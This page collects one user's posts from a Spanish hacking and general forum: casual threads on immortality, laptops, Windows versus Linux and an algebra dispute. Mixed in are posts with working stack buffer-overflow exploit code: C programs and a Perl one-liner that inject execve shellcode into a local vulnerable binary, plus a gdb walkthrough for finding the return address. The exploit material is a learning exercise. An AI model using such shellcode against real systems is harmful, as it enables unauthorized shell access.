Mensajes

Del que se conecta? Pues mira los logs   no tiene vuelta de hoja. Y si pruebas a mirar el README?

lo mejor que se podria hacer si se fuera inmortal sería curar el cancer y enfermedades como esas, así se podría alargar mucho mas la vida de algunas personas. Por lo demas vivir en armonía sería lo primordial, imaginense una guerra eterna, si la inmortalidad significa un eterno conflicto prefiero la mortalidad...saludos

Se resume todo... Bien razonado, Mini-nauta...
Una cosa... Si somos inmortales no tendremos enfermedades no? Porque si no, moriríamos...

Paradójicamente, para vivir antes hay que morir...

Wow sería increible... Os imaginais a tu pareja mirandose en ese espejo? 

El Bell esta muy bien, sencillo y elegante...
Sin embargo, el HP es igual pero más... "bonito".

Dudaria entre ambos. Depende de para qué usarlo y del precio...

Jaja como no fumo...
Si te doy mi opinión...
1) Es muy seria y aburrida. No se le ve alegre. Además es viejísima...
2) Parece ... Sin comentarios. No es alegre, es guarrilla . PD: Rubia? Y?

Soy dificilillo, pero esto ha sido facil jeje...

Habeis probado a meter de contraseña "espacioblanco"? No la adivinareis nunca...

Mmm que guay, nunca he visto ninguno...
Una cosa, yo llegue tarde a esto del Spectrum y demás... He oído hablar de ellos y el otro día un amigo me contó algunas cosillas... Como eran? Iban bien? Que hacíais con ellos? Etc.

Un saludo!

No, eso que pusiste no es mi code.

Tiene errores, como

Código [Seleccionar] Expandir

char nops[23] = ""; es nops[24] . Quiza por eso te tira segmentation fault.

Y eso del sprintf que ya te dije .



Pon mas informacion, que distro usas ???

Yo uso OpenSuSe y me funciona perfecto.

Sa1uDoS

P.D.:Agregame al MSN si quieres y miramos que es con mas detalle .



EDIT:

A mi asi me funciona:

Código (c) [Seleccionar] Expandir

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(){

char exp[] = "./bof";
char nops[24] = "";
memset(nops, '\x90', 23);
char shellcode[]="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
char ret[]="\x18\x1f\x9b\xbf";

char *cmd;
cmd=(char *)malloc(strlen(exp) + strlen(nops) + strlen(shellcode) + strlen(ret) + 1);

sprintf(cmd,"%s %s%s%s", exp, nops, shellcode, ret);

system(cmd);
free(cmd);

return 0;
}




EDIT2:

Prueba si quieres con una shellcode que he hecho yo , aunque la de Sagrini va genial tambien.

Código (c) [Seleccionar] Expandir

#include <stdio.h> /* Para Sprintf */
#include <string.h> /* Para memset */
#include <stdlib.h> /*Para malloc y system */

int main()
{
char name[]="./bof";
char nops[26]="";
memset(nops, '\x90', 25); /* Copiamos el byte 90 25 veces en la variable nops */
char shellcode[]="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
"\x31\xc9\x31\xd2\xb0\x0b\xcd\x80";
char ret[]="\x18\x1f\x9b\xbf";

char *cmd;/* Definimos un puntero donde juntaremos todo, para llamarlo con system */
cmd=(char *)malloc(sizeof(name)+sizeof(nops)+sizeof(shellcode)+sizeof(ret)+1);/* Reservamos la memoria necesaria
para juntar todo */
sprintf(cmd, "%s %s%s%s", name,nops,shellcode,ret);/* Juntamos name, nop, shellcode y ret en el
puntero cmd, entre name y los demas campos dejamos un espacio */
system(cmd);
free(cmd);/* Liberamos la memoria */
return 0;
}


Wow gracias por revivir a todos! Estaba tanto con el taller que se me habia pasado...
Como os comentaba, podeis probar a hacerlo con Perl desde la linea de comandos
./vuln $(perl -e 'print "\x90"x11 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\xXX\xXX\xXX\xXX"')

Las XX las sustituis por vuestra direccion de regreso . Aqui pongo la de la variable buffer, donde se encuentra la shellcode. Aparte, si os dais cuenta...
11 + 25 + 4 = 40. Buffer = 36. Que pasa? Porque en medio tenemos EBP y el ret. Pues lo que pasa es que al volver se quitan 4 bytes .
Bueno, hago eso y me suelta la shell.
Ahora, para vuestra direccion de regreso...

Código [Seleccionar] Expandir


juanra@Juanra:~/Escritorio/Shell$ gcc -o vuln vuln.c --no-stack-protector -z execstack [b]-g[/b]
juanra@Juanra:~/Escritorio/Shell$ gdb -q vuln
(gdb) br vuln
Breakpoint 1 at 0x80483ca: file vuln.c, line 7.
(gdb) r AAA
Starting program: /home/juanra/Escritorio/Shell/vuln AAA

Breakpoint 1, vuln (buff=0xbffffb60 "AAA") at vuln.c:7
7 strcpy (buffer, buff);
(gdb) x/x buffer
[b]0xbffff904[/b]: 0x00000000
(gdb)


Ahora, si quereis le sumais algo por si las moscas

Wow que de comentarios!

Windows es mejor que linux...
1- Compatibilidad.
2- Cantidad de software que hay para este.
3- Es compatible para el hack.
4- La instalaciones de software vale para tontos.
5- No tiene que recurrir a la emulacion de windows XDDD para la utilizacion de algun programa.
6- Mi windows 7 Es pirata y microsoft me lo actualiza por ahora xDD.
... no se me ocurre nada  más xDDD

Tzhed y tu os habeis aliado contra mi  jeje...
1. Compatibilidad con los programas para Windows. A veces ni eso.
2. Claro, si todos prefieren las ventanitas a las ventanitas con terminales...
3. Ah si? Lo has probado alguna vez?
4. Claro, y la de linux: sudo apt-get autoupdate. Pero que se actualiza?
5. Claro, si estas en Windows... Hay programas para linux, sabes?
6. Si, los de Microsoft te lo actualizan para que te quedes

Descarga Ubuntu, alguna sencillita... Y Wine xD.
Luego, con la de errores que tiene, los pantallazos, cuando se congela, cuando te cargas el PC por nada...
Algunos habeis hecho una buena defensa de Windows; el problema es que Windows es tan malo que no se puede defender. Aparte de millones de users y cientos de juegos... Que tiene?
PD: Algunos comentarios de Linux hacen gracia 

[4 = 4]

Y porque sigues poniendo esas comprobaciones? xDSi miras bien es:
4 + (5-1) = 2(5) - 2
4 + 4 = 10 - 2
8 = 8

Y solo digo q tengo mas experiencia talvez, no se mucho, pero vs q decis q tenes 12 años, cosa q no creo.. es dificil q sepas algunas cosas

No tengo problema en que no creas en eso, no veo que ventaja tendría diciendo eso. Sin embargo, si quieres busco por todos mis post y borro todo eso, no sea que alguien se crea que soy un mentiroso que solo quiere quedar bien.

Aparte...

2+  (x-1)/2  = x -1   // Lo separo bien pa q entiendas xD
4+(x-1)/2 = x -1 // Ahora el 2 esta dividiendo todo el miembro izquierdo entonces podre pasarlo sin problemas multiplicando.

La primera y la segunda son completamente iguales, excepto por la el cuatro duplicado.
2 + (5-1) / 2 = 5-1
2 + 4 / 2 = 4
2 + 2 = 4
4 = 4
Correcto
--------------------------------
4 + (5-1) / 2 = 5 -1
4 + 4 / 2 = 4
4 + 2 = 4
6=4
Creo que está mal...

Aparte, si en vez de...

Código [Seleccionar] Expandir

4 + (5-1) / 2 = 5 -1
Le metemos:

Código [Seleccionar] Expandir

[4 + (5-1)] / 2 = 5 -1
Pues sería correcto...
[4 + (5-1)] / 2 = 5 -1
(4 + 4) / 2 = 5-1
8 / 2 = 4
4 = 4
Ahora, comprendo que no tengo más "experiencia" que tu, si le ves un fallo, dimelo...
Saludos xD